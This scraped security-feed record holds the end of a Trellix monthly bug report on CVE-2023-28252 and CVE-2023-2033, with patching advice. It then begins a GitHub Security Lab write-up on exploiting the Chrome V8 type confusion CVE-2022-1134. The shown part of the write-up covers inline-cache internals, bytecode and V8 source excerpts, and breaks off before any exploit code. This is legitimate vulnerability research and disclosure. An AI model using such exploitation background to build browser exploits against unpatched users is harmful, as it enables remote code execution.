CLFS data structures are old and have had [several](<https://nvd.nist.gov/vuln/detail/CVE-2022-24521>) [vulnerabilities](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>) attributed to them since 2018. The pressing matter with this CVE is that it has been exploited in the wild by cybercriminals to deploy [Nokoyawa ransomware](<https://kcm.trellix.com/corporate/index?page=content&id=KB95686&locale=en_US>).\n\n Gang Gang. \n\n\n### What can I do?\n\nGiven the fact that this vulnerability is being exploited in the wild to deliver ransomware, it is recommended to patch your systems as soon as possible. You can find the patch details [here](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252>).\n\n## CVE-2023-2033: V8 fragged out\n\n### What is it?\n\nIt looks like Google\u2019s Cl\u00e9ment Lecigne isn\u2019t content with finding bug after bug in Apple\u2019s Webkit and has also set his sights on Google\u2019s own V8 Javascript engine, used in Google Chrome and other Chromium-based browsers like Edge and Opera. CVE-2023-2033 is yet another type confusion bug in V8, this one affecting all versions of Chrome prior to 112.0.5616.121. Wow, that was a mouth full; maybe we can get a bit more streamlined with version numbers instead of [APT naming conventions](<https://www.securityweek.com/microsoft-will-name-apts-actors-after-weather-events/>).\n\n### Who cares?\n\n[Google stated](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>) that it is aware this CVE has been exploited in the wild. Thus, I think most of us care at this point, whether we like it or not. I tried not to, but I somehow found myself using Google Chrome again. In fact, I now have 128 GB of RAM to safely use a window with a single tab in Chrome. Don\u2019t act like Firefox is any better; I had so many plugins that I had to migrate it to one of those enterprise servers with a terabyte of RAM. \n\n Death is near. \n\n\n### What can I do?\n\nGiven that this vulnerability has been observed being exploited in the wild, the best course of action is to patch ASAP. You can start by consulting Google\u2019s [Chrome Releases](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>) for more details. According to the [Chromium Security](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) page, these releases also apply to the Chromium project and, by extension, Chromium-based browsers that aren\u2019t Chrome.\n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-05-03T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 April 2023 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2022-24521", "CVE-2022-37969", "CVE-2022-42856", "CVE-2023-2033", "CVE-2023-28205", "CVE-2023-28252", "CVE-2023-29389"], "modified": "2023-05-03T00:00:00", "id": "TRELLIX:8BD01EA6BA65A0EAF5676CDB45BF0A4D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-april-2023-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2022-07-06T17:28:30", "description": "In this post I&#x27;ll exploit CVE-2022-1134, a type confusion in V8, the JavaScript engine of Chrome that I reported in March 2022, as [bug 1308360](<https://bugs.chromium.org/p/chromium/issues/detail?id=1308360>) and was fixed in version [100.0.4896.60](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_29.html>). This bug allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site. The bug exists in the super inline cache (SuperIC) feature, which has a history of exploitable vulnerabilities. In what follows, I&#x27;ll go through some implementation details of the inline cache, as well as interactions between V8 and Blink (the Chrome renderer), to fill in the background required to understand and exploit this bug.\n\n## Inline cache in V8[](<https://github.blog/2022-06-29-the-chromium-super-inline-cache-type-confusion/#inline-cache-in-v8>)\n\nInline cache is an optimization used in V8 for speeding up property accesses in bytecode generated by [Ignition](<https://v8.dev/docs/ignition>) (the interpreter in V8). Roughly speaking, when a JavaScript function is run, Ignition will compile the function into bytecode, which then collects profiling data and feedback every time the function is run. The feedback is then used by the JIT compiler to generate optimized machine code at a later stage. As the V8 optimization pipeline is very well documented, I&#x27;ll not repeat the details here, but refer readers to [this article](<https://v8.dev/docs/ignition>) and the references within. Readers may also wish to consult [&quot;JavaScript engine fundamentals: Shapes and Inline Caches&quot;](<https://mathiasbynens.be/notes/shapes-ics>) by Mathias Bynens to get a high-level understanding of object types and inline cache in V8.\n\nTo distinguish between object types and optimize property accesses, each JavaScript object in V8 stores a `map` as its first property:\n \n \n DebugPrint: 0x282908049499: [JS_OBJECT_TYPE]\n - map: 0x282908207939 <Map(HOLEY_ELEMENTS)> [FastProperties]\n ...\n 0x282908207939: [Map]\n - type: JS_OBJECT_TYPE\n - instance size: 16\n - inobject properties: 1\n - elements kind: HOLEY_ELEMENTS\n - unused property fields: 0\n - enum length: 1\n ...\n \n\nThe `map` of an object stores important information, such as the `type` of the object, and the offsets of each of its properties. The memory layout of objects with the same map are the same, meaning that their properties are at the same offsets. This allows property accesses to be optimized once the `map` of an object is known. In overly simplified terms, when the bytecode for a property access is run, the maps of the input objects are recorded, and an optimized handler is created for each `map`. When the function is run in the future, if an object of a known `map` is passed, the optimized handler corresponding to this `map` is used to access the property of the object.\n\n### Bytecode handling in V8[](<https://github.blog/2022-06-29-the-chromium-super-inline-cache-type-confusion/#bytecode-handling-in-v8>)\n\nTo get a better understanding of what actually happens, I&#x27;ll now go through a concrete example to show the general process of inline caching. Take the following function as an example:\n \n \n function f(a) {\n return a.x\n }\n \n\nI can run it in V8 and use the `print-bytecode` flag to print out the generated bytecode\n \n \n [generated bytecode for function: f (0x11e7001d36cd <SharedFunctionInfo f>)]\n ...\n Bytecode Age: 0\n 0x11e7001d3886 @ 0 : 2d 03 00 00 GetNamedProperty a0, [0], [0]\n 0x11e7001d388a @ 4 : a9 Return \n \n\nWe see that `GetNamedProperty` is the bytecode generated for the property access `a.x`. In V8, property accesses are divided into `NamedProperty` and `KeyedProperty`, where `NamedProperty` refers to the usual properties that are accessed as a property, for example, `a.x`, while `KeyedProperty` refers to element-like properties that are indexed numerically, for example, `a[1]`. Therefore, for example, the following function\n \n \n function f(a) {\n return a[1]\n }\n \n\ngenerates the `GetKeyedProperty` bytecode instead:\n \n \n [generated bytecode for function: f (0x1e8d001d36cd <SharedFunctionInfo f>)]\n ...\n Bytecode Age: 0\n 0x1e8d001d386a @ 0 : 0d 01 LdaSmi [1]\n 0x1e8d001d386c @ 2 : 2f 03 00 GetKeyedProperty a0, [0]\n 0x1e8d001d386f @ 5 : a9 Return \n \n\nThe bytecodes generated are handled by various `[IGNITION_HANDLER](<https://source.chromium.org/chromium/chromium/src/+/c4430196c7c0ca1445dc48151912e659c80fc913:v8/src/interpreter/interpreter-generator.cc;l=41>)`. For example, the `GetNamedProperty` bytecode is handled by [the following handler](<https://source.chromium.org/chromium/chromium/src/+/c4430196c7c0ca1445dc48151912e659c80fc913:v8/src/interpreter/interpreter-generator.cc;l=522>).\n \n \n IGNITION_HANDLER(GetNamedProperty, InterpreterAssembler) {\n ...\n accessor_asm.LoadIC_BytecodeHandler(&params, &exit_point);\n \n BIND(&done);\n {\n SetAccumulator(var_result.value());\n Dispatch();\n }\n }\n \n\nThe handler delegates the task to `[LoadIC_BytecodeHandler](<https://source.chromium.org/chromium/chromium/src/+/c4430196c7c0ca1445dc48151912e659c80fc913:v8/src/ic/accessor-assembler.cc;drc=242da5037807dde3daf097ba74f875db83b8b613;l=2992>)`. This function inspects the feedback collected by this particular bytecode (that is, the input passed to this bytecode operation so far) and determines how the property should be accessed. When the function is first run, there isn&#x27;t any feedback, so the property access simply falls back to the slow runtime implementation. At the same time, feedback is collected, and optimized property access handlers are cached for the object `map` that was seen.\n \n \n void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,\n ExitPoint* exit_point) {\n ...\n GotoIf(IsUndefined(p->vector()), &no_feedback);\n \n ...\n BIND(&no_feedback); //<---------- no feedback, falls back to runtime implementation\n {\n Comment(\"LoadIC_BytecodeHandler_nofeedback\");\n // Call into the stub that implements the non-inlined parts of LoadIC.\n exit_point->ReturnCallStub(\n Builtins::CallableFor(isolate(), Builtin::kLoadIC_NoFeedback),\n p->context(), p->receiver(), p->name(),\n SmiConstant(FeedbackSlotKind::kLoadProperty));\n }\n ...\n }\n \n\nAfter feedback is collected, the bytecode handler will try to look for a cached optimized property handler that is suitable for accessing the property of the current input:\n \n \n void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,\n ExitPoint* exit_point) {\n ...\n // Inlined fast path.\n {\n Comment(\"LoadIC_BytecodeHandler_fast\");\n \n TVARIABLE(MaybeObject, var_handler);\n Label try_polymorphic(this), if_handler(this, &var_handler);\n \n TNode<MaybeObject> feedback = TryMonomorphicCase( //<-------- Look for cached handler\n p->slot(), CAST(p->vector()), lookup_start_object_map, &if_handler,\n